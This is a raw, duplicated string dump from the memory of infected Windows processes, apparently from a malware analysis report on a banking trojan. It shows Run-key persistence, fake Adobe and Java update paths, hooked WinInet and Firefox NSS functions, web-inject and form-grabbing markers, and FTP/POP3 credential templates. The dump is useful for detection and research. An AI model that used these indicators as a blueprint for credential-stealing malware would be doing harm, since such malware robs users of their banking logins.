\install_flash_player_11_active_x_32bit.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ardownload.adobe.com
ardownload.adobe.com
/pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe
/pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe
\AdbeRdr1012_en_US.exe
\AdbeRdr1012_en_US.exe
\Common Files\Java\Java Update\jucheck.exe
\Common Files\Java\Java Update\jucheck.exe
https
https
hXXp://VVV.oracle.com/technetwork/java/javase/downloads/jre-6u31-download-1501637.html
hXXp://VVV.oracle.com/technetwork/java/javase/downloads/jre-6u31-download-1501637.html
download.oracle.com
download.oracle.com
/otn-pub/java/jdk/6u31-b05/jre-6u31-windows-i586.exe
/otn-pub/java/jdk/6u31-b05/jre-6u31-windows-i586.exe
\jre-6u31-windows-i586-s.exe
\jre-6u31-windows-i586-s.exe
%s=%s
%s=%s
Range: bytes=%d-%d
Range: bytes=%d-%d
Cookie:%s
Cookie:%s
Cache-Control: %s
Cache-Control: %s
Connection: %s
Connection: %s
Content-Length: %d
Content-Length: %d
Host: %s
Host: %s
Accept-Encoding: %s
Accept-Encoding: %s
Content-Type: %s
Content-Type: %s
User-Agent: %s
User-Agent: %s
Accept-Language: %s
Accept-Language: %s
Referer: %s
Referer: %s
Accept: %s
Accept: %s
%s %s HTTP/1.1
%s %s HTTP/1.1
Test Using Larger Than Block-Size Key - Hash Key First
Test Using Larger Than Block-Size Key - Hash Key First
Test Using Larger Than Block-Size Key and Larger Than One Block-Size Data
Test Using Larger Than Block-Size Key and Larger Than One Block-Size Data
This is a test using a larger than block-size key and a larger than block-size data. The key needs to be hashed before being used by the HMAC algorithm.
This is a test using a larger than block-size key and a larger than block-size data. The key needs to be hashed before being used by the HMAC algorithm.
gpw_e24=http://VVV.oracle.com/technetwork/java/javase/downloads/jre-6u31-download-1501637.html
gpw_e24=http://VVV.oracle.com/technetwork/java/javase/downloads/jre-6u31-download-1501637.html
s_sq=[[B]];
s_sq=[[B]];
%s=%s;
%s=%s;
GetProcessHeap
GetProcessHeap
CreateIoCompletionPort
CreateIoCompletionPort
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
.text
.text
`.rdata
`.rdata
@.data
@.data
.idata
.idata
.reloc
.reloc
svchost.exe_1512_rwx_20211000_00357000:
L$.UQf
L$.UQf
D$.UP
D$.UP
t%UWUj
t%UWUj
%S"$ a
%S"$ a
ADVAPI32.DLL
ADVAPI32.DLL
mscoree.dll
mscoree.dll
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
kernel32.dll
kernel32.dll
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
KERNEL32.DLL
KERNEL32.DLL
.rsrc
.rsrc
.reloc
.reloc
-/*=()[]{}:,|&~#`;\
-/*=()[]{}:,|&~#`;\
export
export
import
import
pmovsxdq%S
pmovsxdq%S
0123456789
0123456789
$*)"-( .& !,'/%#4:92=80>6;1
$*)"-( .& !,'/%#4:92=80>6;1
- $!#/%) *.'&(",=;413?590:>7682
- $!#/%) *.'&(",=;413?590:>7682
{X-X-X-X-XX}
{X-X-X-X-XX}
user32.dll
user32.dll
=%System%\svchost.exe
=%System%\svchost.exe
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryW
GetWindowsDirectoryW
GetConsoleOutputCP
GetConsoleOutputCP
GetCPInfo
GetCPInfo
.text
.text
`.rdata
`.rdata
@.data
@.data
%WinDir%
%WinDir%
Explorer.EXE_532_rwx_20590000_00037000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
tcPR
tcPR
h.exe
h.exe
user32.dll
user32.dll
kernel32.dll
kernel32.dll
|GetWindowsDirectoryA
|GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
ws2_32.dll
ws2_32.dll
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
advapi32.dll
advapi32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
keyworddestination
keyworddestination
USER PASS
USER PASS
PORT
PORT
RapportGP.dll
RapportGP.dll
csshiftjis
csshiftjis
cswindows31j
cswindows31j
iso_646.irv:1991
iso_646.irv:1991
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
windows-874
windows-874
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
HTTP/1.1
HTTP/1.1
\\.\pipe\
\\.\pipe\
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
PTF://%s:%s@%s:%d/
PTF://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
dnsapi.dll
dnsapi.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
InternetOpenUrlA
InternetOpenUrlA
InternetOpenUrlW
InternetOpenUrlW
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
QZ .QZ hSZ B^Z ']Z
QZ .QZ hSZ B^Z ']Z
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
wurlmon.dll
wurlmon.dll
UrlMkGetSessionOption
UrlMkGetSessionOption
nss3.dll
nss3.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
nspr4.dll
nspr4.dll
hXXps://hXXp://TE
hXXps://hXXp://TE
{49A21781-C39D-B603-C11E-00485360D01E}
{49A21781-C39D-B603-C11E-00485360D01E}
%Documents and Settings%\%current user%\Local Settings\Application Data\iwmikkry.log
%Documents and Settings%\%current user%\Local Settings\Application Data\iwmikkry.log
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ExitWindowsEx
ExitWindowsEx
GetKeyboardState
GetKeyboardState
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
|75001234
|75001234
PR_xTCPSh
PR_xTCPSh
wsock32.dll
wsock32.dll
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
keywords
keywords
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
set_url
set_url
WebFilters
WebFilters
WebDataFilters
WebDataFilters
WebFakes
WebFakes
|0123456789
|0123456789
gzipdeflateContent-Type: application/x-www-form-urlencoded
gzipdeflateContent-Type: application/x-www-form-urlencoded
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Cookie: User-Agent-Session: Basic login: Basic password:
Cookie: User-Agent-Session: Basic login: Basic password:
services.exe_724_rwx_20210000_00037000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
tcPR
tcPR
h.exe
h.exe
user32.dll
user32.dll
kernel32.dll
kernel32.dll
|GetWindowsDirectoryA
|GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
ws2_32.dll
ws2_32.dll
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
advapi32.dll
advapi32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
keyworddestination
keyworddestination
USER PASS
USER PASS
PORT
PORT
RapportGP.dll
RapportGP.dll
csshiftjis
csshiftjis
cswindows31j
cswindows31j
iso_646.irv:1991
iso_646.irv:1991
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
windows-874
windows-874
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
HTTP/1.1
HTTP/1.1
\\.\pipe\
\\.\pipe\
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
PTF://%s:%s@%s:%d/
PTF://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
dnsapi.dll
dnsapi.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
InternetOpenUrlA
InternetOpenUrlA
InternetOpenUrlW
InternetOpenUrlW
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
urlmon.dll
urlmon.dll
UrlMkGetSessionOption
UrlMkGetSessionOption
nss3.dll
nss3.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
nspr4.dll
nspr4.dll
hXXps://hXXp://TE
hXXps://hXXp://TE
{49A21781-C39D-B603-C11E-00485360D01E}
{49A21781-C39D-B603-C11E-00485360D01E}
%Documents and Settings%\LocalService\Local Settings\Application Data\iwmikkry.log
%Documents and Settings%\LocalService\Local Settings\Application Data\iwmikkry.log
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ExitWindowsEx
ExitWindowsEx
GetKeyboardState
GetKeyboardState
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
|75001234
|75001234
PR_xTCPSh
PR_xTCPSh
wsock32.dll
wsock32.dll
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
keywords
keywords
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
set_url
set_url
WebFilters
WebFilters
WebDataFilters
WebDataFilters
WebFakes
WebFakes
|0123456789
|0123456789
gzipdeflateContent-Type: application/x-www-form-urlencoded
gzipdeflateContent-Type: application/x-www-form-urlencoded
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Cookie: User-Agent-Session: Basic login: Basic password:
Cookie: User-Agent-Session: Basic login: Basic password:
lsass.exe_736_rwx_20590000_00037000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
tcPR
tcPR
h.exe
h.exe
user32.dll
user32.dll
kernel32.dll
kernel32.dll
|GetWindowsDirectoryA
|GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
ws2_32.dll
ws2_32.dll
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
advapi32.dll
advapi32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
keyworddestination
keyworddestination
USER PASS
USER PASS
PORT
PORT
RapportGP.dll
RapportGP.dll
csshiftjis
csshiftjis
cswindows31j
cswindows31j
iso_646.irv:1991
iso_646.irv:1991
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
windows-874
windows-874
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
HTTP/1.1
HTTP/1.1
\\.\pipe\
\\.\pipe\
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
PTF://%s:%s@%s:%d/
PTF://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
dnsapi.dll
dnsapi.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
InternetOpenUrlA
InternetOpenUrlA
InternetOpenUrlW
InternetOpenUrlW
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
QZ .QZ hSZ B^Z ']Z
QZ .QZ hSZ B^Z ']Z
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
urlmon.dll
urlmon.dll
UrlMkGetSessionOption
UrlMkGetSessionOption
nss3.dll
nss3.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
nspr4.dll
nspr4.dll
hXXps://hXXp://TE
hXXps://hXXp://TE
{49A21781-C39D-B603-C11E-00485360D01E}
{49A21781-C39D-B603-C11E-00485360D01E}
%System%\config\systemprofile\Local Settings\Application Data\iwmikkry.log
%System%\config\systemprofile\Local Settings\Application Data\iwmikkry.log
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ExitWindowsEx
ExitWindowsEx
GetKeyboardState
GetKeyboardState
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
|75001234
|75001234
PR_xTCPSh
PR_xTCPSh
wsock32.dll
wsock32.dll
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
keywords
keywords
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
set_url
set_url
WebFilters
WebFilters
WebDataFilters
WebDataFilters
WebFakes
WebFakes
|0123456789
|0123456789
gzipdeflateContent-Type: application/x-www-form-urlencoded
gzipdeflateContent-Type: application/x-www-form-urlencoded
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Cookie: User-Agent-Session: Basic login: Basic password:
Cookie: User-Agent-Session: Basic login: Basic password:
svchost.exe_904_rwx_20590000_00037000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
tcPR
tcPR
h.exe
h.exe
user32.dll
user32.dll
kernel32.dll
kernel32.dll
|GetWindowsDirectoryA
|GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
ws2_32.dll
ws2_32.dll
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
advapi32.dll
advapi32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
keyworddestination
keyworddestination
USER PASS
USER PASS
PORT
PORT
RapportGP.dll
RapportGP.dll
csshiftjis
csshiftjis
cswindows31j
cswindows31j
iso_646.irv:1991
iso_646.irv:1991
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
windows-874
windows-874
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
HTTP/1.1
HTTP/1.1
\\.\pipe\
\\.\pipe\
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
PTF://%s:%s@%s:%d/
PTF://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
dnsapi.dll
dnsapi.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
InternetOpenUrlA
InternetOpenUrlA
InternetOpenUrlW
InternetOpenUrlW
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
QZ .QZ hSZ B^Z ']Z
QZ .QZ hSZ B^Z ']Z
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
urlmon.dll
urlmon.dll
UrlMkGetSessionOption
UrlMkGetSessionOption
nss3.dll
nss3.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
nspr4.dll
nspr4.dll
